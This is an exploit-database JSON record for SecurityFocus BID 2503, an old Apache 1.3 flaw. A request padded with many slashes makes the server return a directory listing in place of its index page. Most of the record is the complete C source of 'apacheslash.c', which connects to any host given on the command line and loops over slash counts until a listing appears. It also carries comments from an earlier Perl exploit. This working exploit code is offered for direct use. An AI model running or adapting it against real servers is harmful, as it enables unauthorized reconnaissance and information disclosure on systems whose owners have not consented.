Apache 1.3 - Artificially Long Slash Path Directory Listing (2)
{"lastseen": "2020-04-01T19:04:03", "references": [], "description": "\nApache 1.3 - Artificially Long Slash Path Directory Listing (2)", "edition": 1, "reporter": "st0ic", "exploitpack": {"type": "remote", "platform": "multiple"}, "published": "2002-02-21T00:00:00", "title": "Apache 1.3 - Artificially Long Slash Path Directory Listing (2)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2002-02-21T00:00:00", "id": "EXPLOITPACK:02B4E2882B93EF04F7F8B09B4C971317", "href": "", "viewCount": 3, "sourceData": "// source: https://www.securityfocus.com/bid/2503/info\n \nApache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.\n \nA problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.\n \nThis vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. \n\n/*\nProgram: apacheslash.c\nOriginal Date: 2-21-02\nVersion: 1.0\nPlatform: Linux (compiled on SuSE 7.3)\nc0der: st0ic\nsite: www.fsix.net\ne-mail: st0ic@blackcodemail.com\n\nRevised:\n\tNONE thus far\n\nDescription: This program tests an Apache installation for the \"Apache Artificially Long Slash Path \nDirectory Listing Exploit.\" See SecurityFocus.com BID 2503 - http://online.securityfocus.com/bid/2503 \n\nCompile: gcc apacheslash.c -o apacheslash\n\nStuff: I know theres already 3 Perl scripts that test this bug out, but there execution time is horrible\nso I was bored and decided to recode it in C for execution speed sake. On my box, I think it took\nabout 8 mins to send 1000 /'s to apache with apache2.pl. It takes about 2 seconds with this program.\nBTW, SuSE 7.3 comes with Apache 1.3.20, which is NOT vulnerable :-). Check out the securityfocus.com\nBID 2503 to find out whats vulnerable and whats not.\n\nI also included the comments from apache2.pl exploit which was modified\nby Siberian of sentry-labs.com. Read below for the details:\n\n/*************************************************\n#!/usr/bin/perl\n#\n# orginal by farm9, Inc. (copyright 2001)\n# new modified code by Siberian (www.sentry-labs.com)\n#\n########################################################################################\n#\n# Note: This isn't the orginal exploit! This one was modified and partly rewritten. \n#\n# Changes:\n#\n# - help added (more user firendly :-) )\n# - messages added \n# - exploit is now able to be executed on WinNT or 2k.\n# - uses perl version of BSD sockets (compatible to Windows)\n# \n# Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some\n# of the code and made it esaier to use and cross platform compatible.\n# The old verion used a esaier but not that compaible way of socket stream communication. \n# Any network code was replaced by cross platform compatible BSD sockets.\n# (much better than any other stream method :-) )\n# \n# Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)\n#\n# Original comment and source is attached below.\n#\n########################################################################################\n#\n# Name: Apache Artificially Long Slash Path Directory Listing Exploit\n# Author: Matt Watchinski\n# Ref: SecurityFocus BID 2503\n#\n# Affects: Apache 1.3.17 and below\n# Tested on: Apache 1.3.12 running on Debian 2.2\n#\n# Info: This exploit tricks apache into returning a Index of the a directory\n# even if an index.html file is present. May not work on some OS's\n#\n# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in\n#\t very specific cases would feed stat() a filename that was longer than\n#\t stat() could handle. This would result in a condition where stat()\n#\t would return 0 and a directory index would be returned instead of the\n#\t default index.html.\n#\n# Code Fragment: /src/main/http_request.c\n# if (strchr(new_file, '/') == NULL) {\n# char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);\n#\n# rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);\n# rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);\n# ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */\t/*\n# if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part\n# rnew->finfo.st_mode = 0;\n# }\n#\n# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled\n#\t The directory must also have the following Options enabled:\n# Indexes and MultiView\n#\t Some OS's have different conditions on the number of character\n#\t you have to pass to stat to make this work. If stat doesn't\n#\t return 0 for path names less than 8192 or so internal apache\n#\t buffer checks will stop this exploit from working.\n#\n# \t Debian needed around 4060 /'s to make this work.\n#\n# Greets: Special thanks to natasha who added a lot of debug to apache for me\n#\t while i was trying to figure out what had to be enabled to make this\n#\t exploit work. Also thanks to rfp for pointing out that MultiView\n#\t needed to be enabled.\n#\n# More Greets: Jeff for not shooting me :) <All your Cisco's belong to us>\n# Anne for being so sexy <I never though corporate espionage\n# would be so fun>\n# All my homies at farm9\n# DJ Charles / DJ NoloN for the phat beats\n# Marty (go go gadget snort)\n# All my ex-bees\n# RnVjazpIaXZlcndvcmxk\n#\n# I think that wraps it up. Have fun.\n-----snip snip----\n**************************************************/\n\n#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <stdlib.h>\n#include <netdb.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <unistd.h>\n\nchar tmp[10240];\nchar output[10240];\nchar *get = \"GET \";\nchar *slash = \"/\";\nchar *http = \" HTTP/1.0\\r\\n\";\nchar *end = \"\\r\\n\\r\\n\";\nint c, x;\nint port;\nint low;\nint max;\nint sockfd;\nint bytes_recieved;\nint count;\nchar *addr;\n\nstruct sockaddr_in dest_addr;\nstruct hostent *he;\n\nvoid usage(char *ptr)\n{\n\tfprintf(stderr, \"\\n\\t%s <-h host> <-p port> <-l LOW> <-m MAX>\", ptr);\n\tfprintf(stderr, \"\\n\\tExample: %s -h 127.0.0.1 -p 80 -l 1 -m 1000\\n\", ptr);\n\tfprintf(stderr, \"\\n\\tLOW is how many /'s to start with and MAX is how many /'s to end with.\\n\\n\");\n\texit(1);\n}\n\n\nint main(int argc, char *argv[])\n{\n\tprintf(\"\\n\\t[ apacheslash.c ]\");\n\tprintf(\"\\n\\t[ c0ded by st0ic ]\");\n\tprintf(\"\\n\\t[ Fsix.Net ]\");\n\tprintf(\"\\n\\t[ st0ic@happyhack.zzn.com ]\\n\\n\");\n\n\twhile ( ( c = getopt(argc, argv, \"h:p:l:m:\") ) != -1)\n\t{\n\t\tswitch(c)\n\t\t{\n\t\t\tcase 'h':\n\t\t\t{\n\t\t\t\taddr = optarg;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tcase 'p':\n\t\t\t{\n\t\t\t\tport = atoi(optarg);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tcase 'l':\n\t\t\t{\n\t\t\t\tlow = atoi(optarg);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tcase 'm':\n\t\t\t{\n\t\t\t\tmax = atoi(optarg);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tdefault:\n\t\t\t\tusage(argv[0]);\n\t\t}\n\t}\n\n\tif ( low > max || addr == NULL )\n\t\tusage(argv[0]);\n\n\tif ( (he = gethostbyname(addr)) == NULL)\n\t{\n\t\tperror(\"gethostbyname\");\n\t\texit(1);\n\t}\n\n\tdest_addr.sin_family = AF_INET;\n\tdest_addr.sin_addr = *( (struct in_addr *) he->h_addr);\n\tdest_addr.sin_port = htons(port);\n\tmemset (&dest_addr.sin_zero, 0, 8);\n\t\n\tprintf(\"\\t\\n....Working....\\n\");\n\t\n\twhile (low <= max)\n\t{\n\t\tcount = low;\n\t\tbzero(tmp, sizeof(tmp) );\n\t\t\n\t\tif ( (sockfd = socket(AF_INET, SOCK_STREAM, 0) ) == -1)\n\t\t{\n\t\t\tperror(\"socket\");\n\t\t\tbreak;\n\t\t}\n\n\t\tif (connect (sockfd, (struct sockaddr_in *) &dest_addr, sizeof(dest_addr) ) == -1)\n\t\t{\n\t\t\tperror(\"connect\");\n\t\t\texit(1);\n\t\t}\n\t\t\n\t\tstrcpy(tmp, get);\n\t\t\n\t\t/* copy the necessary slashes. */\n for(x = 0; x < count; x++)\n\t\t\tstrcat(tmp, slash);\n\t\t\n\t\tstrcat(tmp, http);\n\t\tstrcat(tmp, end);\n\t\t\n\t\tsend(sockfd, tmp, sizeof(tmp), 0);\n\t\t\n\t\tbytes_recieved = 1;\n\t\twhile(bytes_recieved > 0)\n\t\t{\n\t\t\tbytes_recieved = recv(sockfd, output, sizeof(output), 0);\n\t\t\tif ( (strstr(output, \"Index of\") ) != NULL)\n\t\t\t{\n\t\t\t\tprintf(\"\\n\\tNumber of \\\"/\\\"'s required to generate a directory listing = %d\\n\", low);\n\t\t\t\tclose(sockfd);\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\t\t\n\t\tlow++;\n\t\tclose(sockfd);\n\t}\n\t\n\tprintf(\"\\nHost does not appear to be vulnerable. Maybe try some different numbers...\\n\");\n\t\n\treturn 0;\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645583513, "score": 1659814272}, "_internal": {"score_hash": "4be7110b0ea72533fac2580fc764ca5b"}}